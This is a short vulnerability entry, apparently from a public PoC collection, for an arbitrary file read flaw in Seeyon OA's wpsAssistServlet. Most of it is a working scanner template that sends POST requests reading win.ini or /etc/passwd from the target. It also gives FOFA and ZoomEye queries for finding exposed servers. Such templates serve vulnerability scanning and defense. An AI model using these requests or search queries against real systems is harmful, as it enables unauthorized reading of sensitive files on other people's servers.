seeyon-wpsassist-servlet-fileread: Arbitrary file read vulnerability in Seeyon OA (致远OA)

Date: 2025-09-01 | Affected software: seeyonwpsassistservletfileread | PoC: public

Vulnerability description

FOFA: app="致远互联-OA" && title="V8.0SP2" ZoomEye: app:"用友 致远OA"

PoC code [public]

id: seeyon-wpsassist-servlet-fileread

info:
  name: 致远OA存在任意文件读取漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    FOFA: app="致远互联-OA" && title="V8.0SP2"
    ZoomEye: app:"用友 致远OA"
  tags: seeyon,fileread
  created: 2023/10/31

rules:
  r0:
    request:
      method: POST
      path: /seeyon/wpsAssistServlet
      body: flag=template&templateUrl=C:/windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
  r1:
    request:
      method: POST
      path: /seeyon/wpsAssistServlet
      body: flag=template&templateUrl=/etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() || r1()